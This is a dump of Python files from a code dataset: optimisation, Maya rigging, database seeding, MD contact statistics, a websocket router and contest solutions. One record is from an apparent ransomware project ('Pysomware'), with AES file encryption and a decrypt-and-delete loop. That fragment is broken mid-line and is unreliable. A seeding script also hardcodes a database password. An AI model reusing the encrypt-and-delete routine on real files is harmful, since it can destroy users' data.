def run_Model(rl, instance=1, num_Scenarios=192, Manufacturing_plants=6, Distribution=4, Market=29, Products=3, objDict={'f1': 1, 'f2': 1}):\n    for key, value in objDict.items():\n        objWeights[key] = value\n\n    SetGurobiModel(instance, rl, num_Scenarios, Manufacturing_plants, Distribution, Market, Products)\n    SolveModel(instance, rl, num_Scenarios, Manufacturing_plants, Distribution, Market, Products)\n    PrintToFileSummaryResults(rl)\n","repo_name":"dkabe/SC_Resilience","sub_path":"Stochastic_model/Val_Resilience.py","file_name":"Val_Resilience.py","file_ext":"py","file_size_in_byte":13402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
{"seq_id":"70606882399","text":"import glob\nimport os, struct\nfrom Cryptodome.Cipher import AES\n\n\ndef encrypt_file(key, in_filename, out_filename=None, chunksize=64 * 1024):\n    if not out_filename:\n        out_filename = in_filename + '.enc'\n\n    iv = os.urandom(16)\n    encryptor = AES.new(key, AES.MODE_CBC, iv)\n    filesize = os.path.getsize(in_filename)\n\n    with open(in_filename, 'rb') as infile:\n        with open(out_filename, 'wb') as outfile:\n            outfile.write(struct.pack(' ' + filename)\n        decrypt_file(key, filename)\n        os.remove(filename)","repo_name":"chekestreko/Pysomware","sub_path":"decrypt.py","file_name":"decrypt.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
{"seq_id":"70013391840","text":"import maya.cmds as mc\n\nimport maya.OpenMaya as OpenMaya\n\nimport glTools.utils.base\nimport glTools.utils.mesh\nimport glTools.utils.stringUtils\nimport glTools.utils.surface\n\ndef autoRivet(createRivetTransform=True,suffix='rvt'):\n\t'''\n\tRivet the first selected object to the closest face of the second selected mesh.\n\t'''\n\t# Get User Selection\n\tsel = mc.ls(sl=1)\n\t# Check Selection\n\tif not len(sel) == 2:\n\t\traise Exception('Select object to rivet and then the target mesh!')\n\t\n\t# Determine rivet object and mesh\n\trvtObj = sel[0]\n\tmesh = sel[1]\n\tprefix = glTools.utils.stringUtils.stripSuffix(rvtObj)\n\t\n\t# Get rivet object position\n\tpos = glTools.utils.base.getPosition(rvtObj)\n\tpt = OpenMaya.MPoint(pos[0],pos[1],pos[2],1.0)\n\t\n\t# Get closest face on mesh\n\tfaceId = glTools.utils.mesh.closestFace(mesh,pos)\n\t\n\t# =========================\n\t# - Determine Rivet Edges -\n\t# =========================\n\t\n\tedgeId1 = -1\n\tedgeId2 = -1\n\t\n\t# Create MItMeshEdge\n\tedgeIter = glTools.utils.mesh.getMeshEdgeIter(mesh)\n\t\n\t# Create edgeId MScriptUtil\n\tedgeIdUtil = OpenMaya.MScriptUtil()\n\tedgeIdUtil.createFromInt(0)\n\tedgeIdPtr = edgeIdUtil.asIntPtr()\n\t\n\t# Get face edges\n\tfaceEdges = glTools.utils.mesh.getFaceEdgeIndices(mesh,faceId)\n\t\n\t# Get closest edge\n\tmaxDist = 9999.0\n\tfor edgeId in faceEdges:\n\t\tedgeIter.setIndex(edgeId,edgeIdPtr)\n\t\tedgePt = edgeIter.center(OpenMaya.MSpace.kWorld)\n\t\tedgeDist = (edgePt - pt).length()\n\t\tif edgeDist < maxDist:\n\t\t\tedgeId1 = edgeId\n\t\t\tmaxDist = edgeDist\n\t\n\t# Set current edge\n\tedgeIter.setIndex(edgeId1,edgeIdPtr)\n\t\n\t# Get opposing edge\n\tfaceEdges.remove(edgeId1)\n\tfor edgeId in faceEdges:\n\t\tedgeId2 = edgeId\n\t\t# Check edge connectivity\n\t\tif not edgeIter.connectedToEdge(edgeId): break\n\t\n\t# ========================\n\t# - Create Utility Nodes -\n\t# ========================\n\t\n\t# Rivet Edge 1\n\tedgeCrv1 = prefix+'_edge'+str(edgeId1)+'_rivet_curveFromMeshEdge'\n\tif not mc.objExists(edgeCrv1):\n\t\tedgeCrv1 = mc.createNode('curveFromMeshEdge',n=edgeCrv1)\n\t\tmc.setAttr(edgeCrv1+'.edgeIndex[0]',edgeId1)\n\t\tmc.connectAttr(mesh+'.worldMesh[0]',edgeCrv1+'.inputMesh',f=True)\n\t\n\t# Rivet Edge 2\n\tedgeCrv2 = 
prefix+'_edge'+str(edgeId2)+'_rivet_curveFromMeshEdge'\n\tif not mc.objExists(edgeCrv2):\n\t\tedgeCrv2 = mc.createNode('curveFromMeshEdge',n=edgeCrv2)\n\t\tmc.setAttr(edgeCrv2+'.edgeIndex[0]',edgeId2)\n\t\tmc.connectAttr(mesh+'.worldMesh[0]',edgeCrv2+'.inputMesh',f=True)\n\t\t\n\t# Rivet Loft\n\trivetLoft = prefix+'_face'+str(faceId)+'_rivet_loft'\n\tif not mc.objExists(rivetLoft):\n\t\trivetLoft = mc.createNode('loft',n=rivetLoft)\n\t\tmc.connectAttr(edgeCrv1+'.outputCurve',rivetLoft+'.inputCurve[0]',f=True)\n\t\tmc.connectAttr(edgeCrv2+'.outputCurve',rivetLoft+'.inputCurve[1]',f=True)\n\t\n\t# Rivet Point on Surface Info\n\trivetPosi = prefix+'_face'+str(faceId)+'_rivet_pointOnSurfaceInfo'\n\trivetPosi = mc.createNode('pointOnSurfaceInfo',n=rivetPosi)\n\tmc.connectAttr(rivetLoft+'.outputSurface',rivetPosi+'.inputSurface')\n\t\n\t# ===========================\n\t# - Get Rivet UV Parameter -\n\t# ===========================\n\t\n\t# Build Temp Surface\n\ttmpSrfShape = mc.createNode('nurbsSurface')\n\ttmpSrf = mc.listRelatives(tmpSrfShape,p=True,pa=True)[0]\n\tmc.connectAttr(rivetLoft+'.outputSurface',tmpSrfShape+'.create',f=True)\n\t\n\t# Get closest point on surface\n\tuv = glTools.utils.surface.closestPoint(tmpSrf,pos)\n\t\n\t# Set rivet parameter\n\tmc.setAttr(rivetPosi+'.parameterU',uv[0])\n\tmc.setAttr(rivetPosi+'.parameterV',uv[1])\n\t\n\t# Delete Temp Surface\n\tmc.delete(tmpSrf)\n\t\n\t# ==========================\n\t# - Attach Rivet Transform -\n\t# ==========================\n\t\n\t# Determine rivet transform\n\trvtTransform = rvtObj\n\tif createRivetTransform: rvtTransform = mc.group(em=True,n=prefix+'_rvt')\n\t\n\t# Connect rivet transform\n\tmc.connectAttr(rivetPosi+'.position',rvtTransform+'.t',f=True)\n\t\n\t# Parent to rivet transform\n\tif createRivetTransform: mc.parent(rvtObj,rvtTransform)\n\t\n\t# =================\n\t# - Return Result -\n\t# =================\n\t\n\treturn rvtTransform\n","repo_name":"auqeyjf/pubTool","sub_path":"glTools-master/tools/autoRivet.py","file_name":"autoRivet.py","file_ext":"py","file_size_in_byte":3855,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"74867806237","text":"from sqlalchemy.orm import Session\n\nfrom Model import Comment, Translation, Language, Category\n\nfrom sqlalchemy import create_engine\nengine = create_engine(\"postgresql://postgres:mat610@localhost/discuss\")\n\n\nsession = Session(bind=engine)\n# session = sessionmaker(bind=engine)\n\n# init_sqlalchemy()\ncategories = [\n Category(name='Children'),\n Category(name='Cars'),\n Category(name='Jokes'),\n Category(name='Religion'),\n Category(name='Philosophy'),\n Category(name='Leadership'),\n Category(name='Marriage'),\n Category(name='Cooking'),\n Category(name='Technology'),\n Category(name='Spiritual')\n]\n\nlanguages = [\n Language(name='Spanish', code=\"SP\"),\n Language(name='French', code='FR'),\n Language(name='German', code='GR')\n]\n\ncomments = [\n Comment(comment='I know what I am doing!', category_id=6, score=0),\n Comment(comment='I want to pupu!', category_id=1, score=0),\n Comment(comment='Toyota is my best car', category_id=2, score=0),\n Comment(comment='I love shits', category_id=3, score=0),\n Comment(comment='He is a devoted man', category_id=4, score=0),\n Comment(comment='Wishes are not horses', category_id=5, score=0),\n Comment(comment='My wife is my best friend', category_id=7, score=0),\n Comment(comment='I love Nigeria jollof', category_id=8, score=0),\n Comment(comment='You have to 
learn the version 12.3.0', category_id=9, score=0),\n Comment(comment='I can see the hidden things of your mind', category_id=10, score=0),\n Comment(comment='This is just an extra joke', category_id=3, score=0)\n]\n\ntranslations = [\n Translation(translation='Js affsdf meea takaf sf', comment_id=1, language_id=1),\n Translation(translation='Int pas me de vo', comment_id=1, language_id=2),\n Translation(translation='Yusss maytt tos', comment_id=1, language_id=3),\n Translation(translation='JIngro dosh', comment_id=2, language_id=1),\n Translation(translation='Maya na dos viszoz', comment_id=2, language_id=2),\n Translation(translation='Jytto pa senta', comment_id=2, language_id=3),\n]\n\nsession.bulk_save_objects(categories)\nsession.bulk_save_objects(languages)\nsession.bulk_save_objects(comments)\nsession.bulk_save_objects(translations)\nsession.commit()\n","repo_name":"andela-onnenanya/discuss","sub_path":"bulkLoad.py","file_name":"bulkLoad.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"38533697131","text":"import csv\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set_context(\"talk\", font_scale=1.4)\nsns.set_style(\"whitegrid\")\nimport statistics\n\nfrom scipy.stats import ttest_ind_from_stats\n\ndef plot_compare():\n\tx = []\n\ty = [] \n\txerr = []\n\tyerr = []\n\ti = j = 0\n\twith open('data.tsv','r') as tsvin:\n\t\tfile = csv.reader(tsvin, delimiter='\\t')\n\t\tfor row in file:\n\t\t\tzero_var = ((float(row[2]) == 0) & (float(row[5]) == 0))\n\t\t\tif (not zero_var):\n\t\t\t\ttry: \n\t\t\t\t\ttest_result = ttest_ind_from_stats(float(row[1]), float(row[2]), float(row[3]), float(row[4]), float(row[5]), float(row[6]), equal_var=False)\n\t\t\t\texcept ZeroDivisionError:\n\t\t\t\t\tprint('Oops! 
ERROR') \n\n\t\t\ti = i + 1\n\t\t\tto_small = (float(row[1]) < 5) & (float(row[4]) < 5)\n\t\t\t# check zero_var first so test_result is only read when it was computed\n\t\t\tif ((not zero_var) and (not to_small) and (test_result[1] < 0.05)):\n\t\t\t\tif ('AP8' in row[0]):\n\t\t\t\t\tj = j + 1\n\t\t\t\tx.append(float(row[1]))\n\t\t\t\ty.append(float(row[4]))\n\t\t\t\txerr.append(float(row[2]))\n\t\t\t\tyerr.append(float(row[5]))\n\n\tprint(i)\n\tprint(len(x))\n\tprint(j)\n\t#plt.scatter(x, y, alpha=0.5)\n\tplt.errorbar(x, y, xerr=xerr, yerr=yerr, fmt='o')\n\tplt.xlabel('contact % (G103E)')\n\tplt.ylabel('contact % (+AP8 G103E)')\n\tplt.ylim([0, 100])\n\tplt.xlim([0, 100])\n\tplt.show()\n\n\ndef run_filter(input_file='data.tsv', save_name='data_filtered_p10.tsv'):\n\tout = filter_compare(input_file)\n\twith open(save_name, 'w') as csvout:\n\t\tcsvout = csv.writer(csvout, delimiter='\\t')\n\t\tfor row in out:\n\t\t\tcsvout.writerow(row)\n\treturn out\n\ndef filter_compare(input_file, p_value = 0.10):\n\tfiltered = []\n\twith open(input_file,'r') as tsvin:\n\t\ttsvin = csv.reader(tsvin, delimiter='\\t')\n\t\tfor row in tsvin:\n\t\t\tzero_var = ((float(row[2]) == 0) & (float(row[5]) == 0))\n\t\t\tif (not zero_var):\n\t\t\t\ttest_result = ttest_ind_from_stats(float(row[1]), float(row[2]), float(row[3]), float(row[4]), float(row[5]), float(row[6]), equal_var=False)\n\t\t\tto_small = (float(row[1]) < 5) & (float(row[4]) < 5)\n\t\t\t# same ordering fix as in plot_compare: guard against an unset test_result\n\t\t\tif ((not zero_var) and (not to_small) and (test_result[1] < p_value)):\n\t\t\t\t#write row out\n\t\t\t\tif (float(row[1]) < float(row[4])):\n\t\t\t\t\tif (float(row[1]) == 0):\n\t\t\t\t\t\tratio = -1000\n\t\t\t\t\telse:\n\t\t\t\t\t\tratio = -float(row[4])/float(row[1])\n\t\t\t\telse:\n\t\t\t\t\tif (float(row[4]) == 0):\n\t\t\t\t\t\tratio = 1000\n\t\t\t\t\telse:\n\t\t\t\t\t\tratio = float(row[1])/float(row[4])\n\n\t\t\t\titem = [row[0], row[1][0:6], row[2][0:6], row[3][0:6], row[4][0:6], row[5][0:6], row[6][0:6], ratio]\n\t\t\t\tfiltered.append(item)\n\n\tout = sorted(filtered, key=lambda x: abs(x[7]), reverse=True)\n\treturn out\n\t\n\t\t\t\t\t\n\ndef run_compare(conditions,name):\n\tout = compare_conditions(conditions)\n\twith open(name, 'w') as csvfile:\n\t\tcsvout = csv.writer(csvfile, delimiter='\\t')\n\t\tfor row in out:\n\t\t\tprint(row)\n\t\t\tcsvout.writerow(row)\n\treturn out\n\ndef run_compare_test():\n\t'''\n\tTest the computation of average and standard deviation for 2 conditions\n\t'''\n\tcondition1 = ['testing/test1_contacts.tsv','testing/test2_contacts.tsv']\n\tcondition2 = ['testing/test1_contacts.tsv','testing/test3_contacts.tsv']\n\tout = run_compare([condition1, condition2], 'testing/dataout.tsv')\n\ttest = [['v--A--A', 100.0, 0.0, 2, 50.0, 70.71067811865476, 2],\n\t['v--C--C', 37.5, 17.67766952966369, 2, 37.5, 17.67766952966369, 2],\n\t['v--B--B', 25.0, 35.35533905932738, 2, 50.0, 0.0, 2]]\n\tfor i in range(0,3): \n\t\tif (out[i] != test[i]):\n\t\t\tprint('Test Failed')\n\t\t\treturn\n\tprint('Test Passed')\n\n\ndef compare_conditions(condition_files):\n\t'''\n\tInput list of list of strings, each list is strings for file names of condition\n\t\t[['1/file1.txt', '1/file2.txt'], ['2/file1.txt', '2/file2.txt']]\n\tOutput: list of lists \n\t\teach list contains [interaction key, freq in 1, std in 1, freq in 2, std in 2, ...]\n\tnote the statistics module gives a correct standard deviation (1/N-1 for the averaging)\n\t'''\n\tconditions = []\n\tall_keys = []\n\tfor files in condition_files:\n\t\tdata = frequencies_over_reps(files)\n\t\tconditions.append(data)\n\t\tall_keys.append(data.keys())\n\n
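\t# Caveat: statistics.stdev below needs at least two replicate files per\n\t# condition; with a single file it raises StatisticsError.\n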
\tunique_keys = set().union(*all_keys)\n\n\tcompare = []\n\tfor key in unique_keys:\n\t\tkeyitem = [key]\n\t\tfor i in range(0, len(condition_files)):\n\t\t\tfreq = conditions[i].get(key, [0, 0, 0, 0, 0])\n\t\t\tnobs = len(condition_files[i])\n\t\t\tfreq = fill_blanks(freq, nobs)\n\t\t\tkeyitem.append(statistics.mean(freq))\n\t\t\tkeyitem.append(statistics.stdev(freq))\n\t\t\tkeyitem.append(nobs)\n\t\tcompare.append(keyitem)\n\n\t#sort values by the mean frequency of the first condition\n\tout = sorted(compare, key=lambda x: x[1], reverse=True)\n\n\treturn out\n\ndef fill_blanks(partial_list, expected_length):\n\tfor i in range(0, expected_length-len(partial_list)):\n\t\tpartial_list.append(0)\n\treturn partial_list\n\ndef Union(lst1, lst2):\n    final_list = list(set(lst1) | set(lst2))\n    return final_list\n\ndef frequencies_over_reps(files):\n\t\"\"\"\n\toutput dictionary of contacts\n\tkey is contact key type--atom1--atom2\n\tvalue is list of frequencies for each replicate\n\t\"\"\"\n\ttotals = {}\n\tfor file in files:\n\t\tfile = open(file, \"r\")\n\t\tout = frequencies_from_contacts(file)\n\t\t#aggregate with previous\n\t\tfor key in out:\n\t\t\tif (key in totals): \n\t\t\t\ttotals[key].append(out[key])\n\t\t\telse: \n\t\t\t\ttotals[key] = [out[key]]\n\n\treturn totals\n\ndef frequencies_from_contacts(f):\n\t\"\"\"\n\tfile = open(\"ternary_AP8_MK6_G103E_v1_1_contacts.tsv\", \"r\")\n\tcompute_frequencies(file)\n\n\tParameters\n\t\tf: an open file\n\tReturns\n\t\tdictionary mapping contact to frequency\n\t\"\"\"\n\t#read f to the list format\n\tall_contacts, nframes = parse_contacts(f)\n\tf.close()\n\tcounts = {}\n\tfor item in all_contacts:\n\t\tkey = item[1]+'--'+item[2]+'--'+item[3]\n\t\tif (key in counts): \n\t\t\tcounts[key] = counts[key] + 1\n\t\telse: \n\t\t\tcounts[key] = 1\n\n\tfrequency = {k: v*100.0/nframes for k, v in counts.items()}\n\treturn frequency\n\n\n\ndef parse_contacts(input_lines, itypes=None):\n    \"\"\"\n    Read a contact-file (tab-separated file with columns: frame, i-type, atomid1, atomid2[, atomid3[, atomid4]] and\n    return it as a list of lists with frames converted to ints. The total number of frames is also returned.\n    Example\n    -------\n    parse_contacts([\n    \"# total_frames:2\\n\",\n    \"0  hbbb    A:ALA:1:N   A:THR:10:O\\n\",\n    \"0  vdw     A:ALA:1:CB  B:CYS:3:H\\n\",\n    \"1  vdw     A:ALA:1:N   A:THR:10:C\\n\"\n    ])\n    # returns:\n    # ([\n    #     [0, \"hbbb\", \"A:ALA:1:N\", \"A:THR:10:O\"],\n    #     [0, \"vdw\", \"A:ALA:1:CB\", \"B:CYS:3:H\"],\n    #     [1, \"vdw\", \"A:ALA:1:N\", \"A:THR:10:C\"]\n    # ], 2)\n    Parameters\n    ----------\n    input_lines: iterable\n        Iterator over a set of strings. 
Can be a file-handle\n itypes: set of str | None\n Interactions to include in the output\n Returns\n -------\n (list of list, int)\n The list of interactions and the total number of frames\n \"\"\"\n ret = []\n total_frames = 0\n for line in input_lines:\n line = line.strip()\n if \"total_frames\" in line:\n tokens = line.split(\" \")\n total_frames = int(tokens[1][tokens[1].find(\":\")+1:])\n\n if len(line) == 0 or line[0] == \"#\":\n continue\n\n tokens = line.split(\"\\t\")\n tokens[0] = int(tokens[0])\n\n if itypes is None or tokens[1] in itypes:\n ret.append(tokens)\n\n return ret, total_frames\n\nif __name__== \"__main__\":\n\t#run_compare_test()\n\t#plot_compare()\n\trun_filter()\n","repo_name":"lxpowers33/md_utils","sub_path":"md_contacts.py","file_name":"md_contacts.py","file_ext":"py","file_size_in_byte":7243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"16825058468","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nTest case 5\r\n\r\nApply VDG algorithm on ARPEGE forecast on a tropical cyclone (Freddy, February 2023).\r\nRequired inputs :\r\n - inputdef file ./inputs/indef_testcase5.json\r\n - algodef file ./inputs/algo_testcase5.json\r\n - reference input file (that has been processed from https://www.ncei.noaa.gov/data/international-best-track-archive-for-climate-stewardship-ibtracs/v04r00/access/csv/ibtracs.last3years.list.v04r00.csv)\r\n - data files /cnrm/recyf/NO_SAVE/Data/users/plu/TRAJECT/ARPfc/vdg/grid*.grib (as specified in inputdef file)\r\n\r\nExpected outputs (in ./test5/):\r\n - track file track_test_case5.json\r\n - figure file track_test_case5.png\r\n\r\n\"\"\"\r\n\r\nfrom traject import *\r\n\r\n#Epygram environment\r\nimport epygram\r\nepygram.init_env()\r\nos.environ[\"ECCODES_SAMPLES_PATH\"]=(\"/home/common/epygram/ext/eccodes/share/eccodes/samples\")\r\n\r\n#Directory\r\nrepin='./inputs/'\r\nrepout='./test5/'\r\n\r\ntimeref={'start':\"2023021700\",'final':\"2023022300\",'step':\"06\"}\r\ndiags=[\"mslp_min\",\"ff10m_max\"]\r\n\r\n#If you want to apply this case on another cyclone, then get input reference file from IbTracs (https://www.ncei.noaa.gov/data/international-best-track-archive-for-climate-stewardship-ibtracs/v04r00/access/csv/ibtracs.last3years.list.v04r00.csv) and uncomment the following lines:\r\ncycname=\"FREDDY\"\r\nibfile=repin+\"ibtracs_\"+cycname+\".json\" #Reference input file\r\nif False:\r\n domtraj={\"lonmin\":-30.0,\"lonmax\":90.0,\"latmin\":-40.0,\"latmax\":-5.0} #same as indef_testcase5.json\r\n lref=ConvertIBTRACS(\"./ibtracs.last3years.list.v04r00.csv\",timeref,domtraj,diags=diags)\r\n mslp_thr=1010.0 #Threshold (hPa) to keep the track\r\n for traj in Select(lref,{\"name\":cycname}):\r\n print(traj.name,traj.basetime)\r\n mini = traj.tmin(\"mslp_min\")/100.0\r\n if mini 0:\n left_group_pivot_df = comparison_df.loc[:, [i for i in comparison_df if i.split(\"_\")[0] == left_group_name and i.split(\"_\")[1].startswith(\"/\")]]\n right_group_pivot_df = comparison_df.loc[:, [i for i in comparison_df if i.split(\"_\")[0] == right_group_name and i.split(\"_\")[1].startswith(\"/\")]]\n comparison_dir = \"{a}{b}/\".format(a=output_dir, b=comparison_string)\n os.makedirs(comparison_dir, exist_ok=True)\n comparison_df.to_csv(path_or_buf=\"{}pivot.tsv\".format(comparison_dir), sep='\\t', header=True, index=True)\n left_group_pivot_df.to_csv(path_or_buf=\"{a}raw_{b}.tsv\".format(a=comparison_dir, b=left_group_name), sep='\\t', header=True, index=True)\n 
right_group_pivot_df.to_csv(path_or_buf=\"{a}raw_{b}.tsv\".format(a=comparison_dir, b=right_group_name), sep='\\t', header=True, index=True)\n            boxplots_dir = \"{}boxplots/\".format(comparison_dir)\n            os.makedirs(boxplots_dir, exist_ok=True)\n            for base_id in comparison_df.index.tolist():\n                annotated_id = comparison_df.loc[base_id, annotation_col_name]\n                # NaN is float type\n                if not isinstance(annotated_id, str):\n                    annotated_id = comparison_df.loc[base_id, \"former_id\"]\n                self._draw_boxplot(left_list=left_group_pivot_df.loc[base_id].values.tolist(),\n                                   right_list=right_group_pivot_df.loc[base_id].values.tolist(),\n                                   left_name=left_group_name,\n                                   right_name=right_group_name,\n                                   title=annotated_id,\n                                   output_file=\"{a}{b}.png\".format(a=boxplots_dir, b=base_id))\n","repo_name":"ivasilyev/curated_projects","sub_path":"meta/scripts/PivotTableAnnotator.py","file_name":"PivotTableAnnotator.py","file_ext":"py","file_size_in_byte":4738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"31669522279","text":"count_students = int(input())\nall_sum_grades = 0\nnumber_middle_grades = 0\nnumber_good_grades = 0\nnumber_very_good_grades = 0\nnumber_excellent_grades = 0\nfor i in range(1, count_students + 1):\n    exam_grade = float(input())\n    all_sum_grades += exam_grade\n    if 2 <= exam_grade < 3:\n        number_middle_grades += 1\n    elif 3 <= exam_grade < 4:\n        number_good_grades += 1\n    elif 4 <= exam_grade < 5:\n        number_very_good_grades += 1\n    else:\n        number_excellent_grades += 1\nprint(f\"Top students: {number_excellent_grades / count_students * 100:.2f}%\")\nprint(f\"Between 4.00 and 4.99: {number_very_good_grades / count_students * 100:.2f}%\")\nprint(f\"Between 3.00 and 3.99: {number_good_grades / count_students * 100:.2f}%\")\nprint(f\"Fail: {number_middle_grades / count_students * 100:.2f}%\")\nprint(f\"Average: {all_sum_grades / count_students:.2f}\")\n\n","repo_name":"VladiNikolov/python_basics","sub_path":"PB _More_Exercises/For_Loop/04_grades.py","file_name":"04_grades.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"}
{"seq_id":"19567249846","text":"import asyncio\nimport json\nfrom collections import namedtuple\n\nfrom aiohttp import client\n\nfrom Utils import Redis\nfrom Utils.Configuration import API_LOCATION\nfrom Utils.Perms import DASH_PERMS\nfrom routers.websocket import socket_by_subscription\n\n# stats handlers\nstat_sender = None\n\n\nasync def stats_start():\n    global stat_sender\n    stat_sender = asyncio.create_task(stats_sender())\n    asyncio.ensure_future(stat_sender)\n\n\nasync def stats_sender():\n    while True:\n        await asyncio.sleep(10)\n        await send_to_subscribers(\"stats\", **await Redis.get_redis().hgetall(\"botstats\"))\n\n\nasync def stats_send(websocket, subkey):\n    global stat_sender\n    if stat_sender.cancelled() or stat_sender.done():\n        stat_sender = asyncio.create_task(stats_sender())\n    await websocket.send_json({\n        \"type\": \"stats\",\n        \"content\": await Redis.get_redis().hgetall(\"botstats\")\n    })\n\n\nasync def stats_end():\n    stat_sender.cancel()\n\n\nasync def guilds_start(websocket, subkey):\n    # tell the bot to send this user's guilds\n    await Redis.send_to_bot(\"user_guilds\", user_id=subkey)\n\n    # get non gearbot servers\n    headers = {\n        \"Authorization\": f\"Bearer {websocket.auth_info.user.api_token}\"\n    }\n\n    async with client.ClientSession() as session_pool:\n\n
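        # Fetch the user's guild list from Discord's API with their bearer\n        # token; anything other than a list means the token is invalid, so the\n        # user is de-authed below and the handler bails out.\n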
session_pool.get(f\"{API_LOCATION}/users/@me/guilds\", headers=headers) as resp:\n guild_list = await resp.json()\n if not isinstance(guild_list, list):\n from Utils.Auth import deauth_user\n await deauth_user(websocket.auth_info.user.id)\n await websocket.auth_info.delete()\n return False\n to_send = dict()\n for guild in guild_list:\n if guild[\"owner\"] or guild[\"permissions\"] & 32 == 32:\n to_send[str(guild[\"id\"])] = {\n \"id\": str(guild[\"id\"]),\n \"name\": str(guild[\"name\"]),\n \"icon\": guild[\"icon\"]\n }\n await websocket.send_json({\n \"type\": \"guilds\",\n \"content\": {\n \"type\": \"all_guilds\",\n \"guilds\": to_send\n }\n })\n\n await session_pool.close()\n\n\ndef is_last_subkey(channel, subkey):\n for holder in socket_by_subscription[channel]:\n if holder.subkey == subkey:\n return False\n return True\n\n\nasync def guilds_end(websocket, subkey):\n if is_last_subkey(\"guilds\", subkey):\n await Redis.send_to_bot(\"user_guilds_end\", user_id=subkey)\n\n\nasync def always_allowed(info, subkey):\n return True\n\n\nasync def user_id_check(info, subkey):\n return info is not None and subkey == str(info.user_id)\n\n\ndef needs_perm(perm):\n async def actual_checker(info, subkey):\n if info is None:\n return False\n user_perms = await Redis.ask_the_bot(\"guild_user_perms\", guild_id=subkey, user_id=info.user_id)\n return (user_perms & perm) == perm\n\n return actual_checker\n\n\nasync def guild_info_start(websocket, subkey):\n await Redis.send_to_bot(\"guild_info_watch\", guild_id=subkey, user_id=websocket.auth_info.user_id)\n\n\nasync def guild_info_end(websocket, subkey):\n await Redis.send_to_bot(\"guild_info_watch_end\", guild_id=subkey, user_id=websocket.auth_info.user_id)\n\n\nChannelHandlers = namedtuple(\"ChannelHandlers\", \"allowed start add remove end\")\nhandlers = {\n \"stats\": ChannelHandlers(always_allowed, stats_start, stats_send, None, stats_end),\n \"guilds\": ChannelHandlers(user_id_check, None, guilds_start, guilds_end, None),\n \"guild_info\": ChannelHandlers(needs_perm(DASH_PERMS.ACCESS), None, guild_info_start, guild_info_end, None),\n \"guild_settings\": ChannelHandlers(needs_perm(DASH_PERMS.VIEW_CONFIG), None, None, None, None)\n # TODO: acutally make this do something\n}\n\n\nasync def subscribe(websocket, message):\n new = False\n channel = message[\"channel\"]\n\n if channel not in handlers:\n await websocket.send_json(dict(type=\"error\", content=\"Unknown channel!\"))\n return\n handler = handlers[channel]\n subkey = message.get(\"subkey\", None)\n if not await handler.allowed(getattr(websocket, \"auth_info\", None), subkey):\n await websocket.send_json(dict(type=\"error\", content=\"You are not allowed to subscribe to this channel!\"))\n return\n\n # create channel list if needed\n if channel not in socket_by_subscription:\n socket_by_subscription[channel] = list()\n new = True\n\n # subscribe and hit that bell for updates!\n if channel not in websocket.active_subscriptions:\n socket_by_subscription[channel].append(websocket)\n websocket.active_subscriptions[channel] = str(subkey)\n else:\n await websocket.send_json({\n \"type\": \"error\",\n \"content\": f\"You are already subscribed to {channel}\"\n })\n\n # NEW CHANNEL HYPE!!!\n if new and handlers[channel].start is not None:\n await handlers[channel].start()\n\n if handlers[channel].add is not None:\n await handlers[channel].add(websocket, subkey)\n\n\nasync def unsubscribe(websocket, message):\n channel = message[\"channel\"]\n\n # you're no longer interesting, unsubscribed\n\n 
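# Side note on the guild filter above: Discord returns "permissions" as a
# bitfield, and 0x20 is the Manage Server (MANAGE_GUILD) bit, so the check
# `permissions & 32 == 32` keeps only guilds the user can manage. Bitwise &
# binds tighter than == in Python, so it parses as (permissions & 32) == 32.
MANAGE_GUILD = 0x20
for perms in (0x20, 0x7F, 0x08):
    print(hex(perms), (perms & MANAGE_GUILD) == MANAGE_GUILD)
# 0x20 True, 0x7f True, 0x8 False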
socket_by_subscription[channel].remove(websocket)\n    if handlers[channel].remove is not None:\n        await handlers[channel].remove(websocket, websocket.active_subscriptions[channel])\n    del websocket.active_subscriptions[channel]\n\n    if len(socket_by_subscription[channel]) == 0:\n        # we lost all our subscribers, better delete our channel and retire\n        del socket_by_subscription[channel]\n        if handlers[channel].end is not None:\n            await handlers[channel].end()\n\n\nasync def send_to_subscribers(channel, subkey=None, uid=None, **kwargs):\n    if channel in socket_by_subscription:\n        for socket in socket_by_subscription[channel]:\n            auth_info = getattr(socket, \"auth_info\", None)\n            if socket.active_subscriptions[channel] == str(subkey) and (uid is None or (auth_info is not None and auth_info.user_id == int(uid))):\n                await socket.send_json(dict(type=channel, content=kwargs))\n","repo_name":"gearbot/Dashboard-api","sub_path":"routers/websocket/subscriptions.py","file_name":"subscriptions.py","file_ext":"py","file_size_in_byte":6190,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"}
+{"seq_id":"1231548200","text":"import sys\r\n\r\nn, *xyh = map(int, sys.stdin.read().split())\r\nxyh = list(zip(*[iter(xyh)] * 3))\r\n\r\ndef conflict(cx, cy, ch, x, y, h):\r\n    return h != max(ch - abs(x - cx) - abs(y - cy), 0)\r\n\r\ndef main():\r\n    for x, y, h in xyh:\r\n        if h >= 1:\r\n            xt, yt, ht = x, y, h\r\n            break\r\n\r\n    for cx in range(101):\r\n        for cy in range(101):\r\n            ch = ht + abs(cx - xt) + abs(cy - yt)\r\n            for x, y, h in xyh:\r\n                if conflict(cx, cy, ch, x, y, h):\r\n                    break\r\n            else:\r\n                return cx, cy, ch\r\n\r\nif __name__ == '__main__':\r\n    ans = main()\r\n    print(*ans, sep=' ')\n","repo_name":"kagemeka/atcoder-submissions","sub_path":"jp.atcoder/abc112/abc112_c/9364041.py","file_name":"9364041.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"}
